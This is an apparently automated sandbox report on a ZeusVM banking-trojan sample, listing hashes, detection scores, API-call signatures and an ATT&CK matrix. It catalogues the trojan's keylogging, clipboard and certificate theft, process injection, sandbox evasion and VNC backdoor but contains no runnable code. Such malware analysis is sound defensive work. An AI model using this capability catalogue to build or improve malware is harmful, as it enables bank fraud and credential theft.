Play interactive tour

Edit tour

Analysis Report E7CThb0bFa

Overview

General Information

Sample Name:	E7CThb0bFa (renamed file extension from none to exe)
Analysis ID:	381780
MD5:	ba28a06e2aae1052319541d4124122c5
SHA1:	20613e49ee5b14dc04c7b045900f1d0e1b4173be
SHA256:	9738c7021fdded8bb03e1588d17386dc175328630ecb0f1a3d671dfc4fb18d46
Tags:	uncategorized
Infos:
Most interesting Screenshot:

Detection

ZeusVM

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Contains functionality to detect sleep reduction / modifications

Injects a PE file into a foreign processes

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

May check if the current machine is a sandbox (GetTickCount - Sleep)

May initialize a security null descriptor

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

E7CThb0bFa.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\E7CThb0bFa.exe' MD5: BA28A06E2AAE1052319541D4124122C5)

E7CThb0bFa.exe (PID: 7048 cmdline: C:\Users\user\Desktop\E7CThb0bFa.exe MD5: BA28A06E2AAE1052319541D4124122C5)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: E7CThb0bFa.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: E7CThb0bFa.exe	Virustotal: Detection: 84%			Perma Link
Source: E7CThb0bFa.exe	ReversingLabs: Detection: 92%

Machine Learning detection for sample

Show sources

Source: E7CThb0bFa.exe

Joe Sandbox ML: detected

Source: 1.2.E7CThb0bFa.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 0.2.E7CThb0bFa.exe.24e0000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.E7CThb0bFa.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00408558 CryptUnprotectData,LocalFree,	1_2_00408558
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00412FA3 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	1_2_00412FA3
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00408558 CryptUnprotectData,LocalFree,	1_1_00408558
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00412FA3 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	1_1_00412FA3

Source: E7CThb0bFa.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_004113A5 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,		1_2_004113A5
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_004113A5 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,		1_1_004113A5

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00405304 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405304
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_2_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_2_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_1_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_1_0041737C

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_00414C41 select,recv,

1_2_00414C41

Source: E7CThb0bFa.exe	String found in binary or memory: http://www.google.com/webhp
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmp, E7CThb0bFa.exe, 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.google.com/webhpbc

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_0041047C GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

1_2_0041047C

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_0042D190 GetKeyboardState,

0_2_0042D190

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00419084 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,		1_2_00419084
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00419084 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,		1_1_00419084

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_004108EC OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

1_2_004108EC

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044A56C NtdllDefWindowProc_A,	0_2_0044A56C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00430020 NtdllDefWindowProc_A,GetCapture,	0_2_00430020
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00424C58 NtdllDefWindowProc_A,	0_2_00424C58
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044AD10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_0044AD10
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044ADC0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_0044ADC0
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0043F83C GetSubMenu,SaveDC,RestoreDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_0043F83C

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_00413620 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

1_2_00413620

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00418801 InitiateSystemShutdownExW,ExitWindowsEx,	1_2_00418801
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0041D21C CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	1_2_0041D21C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00418801 InitiateSystemShutdownExW,ExitWindowsEx,	1_1_00418801
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0041D21C CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	1_1_0041D21C

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00444A1C	0_2_00444A1C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0043F83C	0_2_0043F83C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00414A51	1_2_00414A51
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0040D6D4	1_2_0040D6D4
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00412EAF	1_2_00412EAF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0040171B	1_2_0040171B
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00414A51	1_1_00414A51
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0040D6D4	1_1_0040D6D4
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00412EAF	1_1_00412EAF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0040171B	1_1_0040171B

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: String function: 004041E0 appears 68 times
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: String function: 00406324 appears 61 times

Source: E7CThb0bFa.exe, 00000000.00000002.637101486.0000000000A90000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs E7CThb0bFa.exe

Source: E7CThb0bFa.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: classification engine

Classification label: mal80.bank.troj.evad.winEXE@3/0@0/0

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_0041DA04 GetLastError,FormatMessageA,

0_2_0041DA04

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00405554 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	1_2_00405554
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_004053DF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	1_2_004053DF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00405554 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	1_1_00405554
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_004053DF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	1_1_004053DF

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_004133CA GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		1_2_004133CA
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_004133CA GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		1_1_004133CA

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_004085C0 GetDiskFreeSpaceA,

0_2_004085C0

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_0040647F CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,

1_2_0040647F

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_00408C77 CoCreateInstance,

1_2_00408C77

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00406179 CompareStringA,RtlEnterCriticalSection,FindResourceA,

0_2_00406179

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E7CThb0bFa.exe	Virustotal: Detection: 84%
Source: E7CThb0bFa.exe	ReversingLabs: Detection: 92%

Source: unknown	Process created: C:\Users\user\Desktop\E7CThb0bFa.exe 'C:\Users\user\Desktop\E7CThb0bFa.exe'
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Process created: C:\Users\user\Desktop\E7CThb0bFa.exe C:\Users\user\Desktop\E7CThb0bFa.exe
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Process created: C:\Users\user\Desktop\E7CThb0bFa.exe C:\Users\user\Desktop\E7CThb0bFa.exe	Jump to behavior

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00424218 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00424218

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232BE08 push FAF50000h; retn 0000h	0_3_0232BE0D
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232CB68 push ds; retf 0000h	0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232D354 push ds; retf 0000h	0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02327FA0 pushad ; retf 0000h	0_3_02327FBF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232741D pushfd ; retn 0003h	0_3_02327429
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329865 push edx; iretd	0_3_0232988C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232ACA4 pushad ; retf	0_3_0232ADC2
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02328C9C push ss; retf 004Ch	0_3_02336AFF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329100 push eax; ret	0_3_02329152
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232E57F push ss; iretd	0_3_0232E59F
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232C550 pushfd ; retf	0_3_0232C551
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232D9B3 push edx; retf 0000h	0_3_0232D9EC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232BDF4 push ds; ret	0_3_0232BE07
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_023289E0 push ebx; ret	0_3_02328A0A
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329DEB push ebx; retf 0000h	0_3_02329DEC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232BE08 push FAF50000h; retn 0000h	0_3_0232BE0D
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232CB68 push ds; retf 0000h	0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232D354 push ds; retf 0000h	0_3_0232D370
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02327FA0 pushad ; retf 0000h	0_3_02327FBF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232741D pushfd ; retn 0003h	0_3_02327429
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329865 push edx; iretd	0_3_0232988C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232ACA4 pushad ; retf	0_3_0232ADC2
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02328C9C push ss; retf 004Ch	0_3_02336AFF
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329100 push eax; ret	0_3_02329152
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232E57F push ss; iretd	0_3_0232E59F
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232C550 pushfd ; retf	0_3_0232C551
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232D9B3 push edx; retf 0000h	0_3_0232D9EC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_0232BDF4 push ds; ret	0_3_0232BE07
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_023289E0 push ebx; ret	0_3_02328A0A
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_3_02329DEB push ebx; retf 0000h	0_3_02329DEC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00437334 push 004373C1h; ret	0_2_004373B9

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044A5F4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_0044A5F4
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_004225DC IsIconic,GetWindowPlacement,GetWindowRect,	0_2_004225DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00432878 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_00432878
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044AD10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_0044AD10
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_0044ADC0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_0044ADC0
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_004475DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_004475DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00431744 IsIconic,GetCapture,	0_2_00431744
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00431FF8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_00431FF8

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

0_2_00424218

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00426D88

0_2_00426D88

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

0_2_00449B50

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00426D88

0_2_00426D88

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 0_2_00405304 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405304
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_2_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_2_0041737C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_00417437 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_1_00417437
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0041737C FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_1_0041737C

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_0041DFA0 GetSystemInfo,

0_2_0041DFA0

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

0_2_00424218

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0041C2AE mov edx, dword ptr fs:[00000030h]		1_2_0041C2AE
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_1_0041C2AE mov edx, dword ptr fs:[00000030h]		1_1_0041C2AE

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_0041C5F3 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

1_2_0041C5F3

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Memory written: C:\Users\user\Desktop\E7CThb0bFa.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Process created: C:\Users\user\Desktop\E7CThb0bFa.exe C:\Users\user\Desktop\E7CThb0bFa.exe

Jump to behavior

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_004152ED InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

1_2_004152ED

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_004054DC
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0040C424
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: GetLocaleInfoA,	0_2_0040AE50
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: GetLocaleInfoA,	0_2_0040AE9C
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: GetLocaleInfoA,	0_2_00405E24

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00409924 GetLocalTime,

0_2_00409924

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_00407242 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

1_2_00407242

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 1_2_00411E28 GetTimeZoneInformation,

1_2_00411E28

Source: C:\Users\user\Desktop\E7CThb0bFa.exe

Code function: 0_2_00437334 GetVersion,

0_2_00437334

Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmp

Binary or memory string: S:(ML;;NRNWNX;;;LW)SeSecurityPrivilegeS:(ML;CIOI;NRNWNX;;;LW)?O?I?Tcabcabinet.dllFCICreateFCIAddFileFCIFlushCabinetFCIDestroybcdfghklmnpqrstvwxzaeiouyGlobal\Local\

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.003
Source: E7CThb0bFa.exe, 00000000.00000002.637292990.00000000024E0000.00000004.00000001.sdmp	String found in binary or memory: .exe-fSysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXMERFB 003.003
Source: E7CThb0bFa.exe	String found in binary or memory: RFB 003.003
Source: E7CThb0bFa.exe	String found in binary or memory: RFB 003.003
Source: E7CThb0bFa.exe, 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: .exe-fSysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXMERFB 003.003

Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_0041511E socket,bind,closesocket,		1_2_0041511E
Source: C:\Users\user\Desktop\E7CThb0bFa.exe	Code function: 1_2_00414E40 socket,bind,listen,closesocket,		1_2_00414E40

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture11	System Time Discovery2	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Create Account1	Valid Accounts1	Obfuscated Files or Information21	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Valid Accounts1	Access Token Manipulation11	Install Root Certificate1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection111	Software Packing11	NTDS	System Information Discovery15	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Valid Accounts1	LSA Secrets	Network Share Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation11	Cached Domain Credentials	Security Software Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
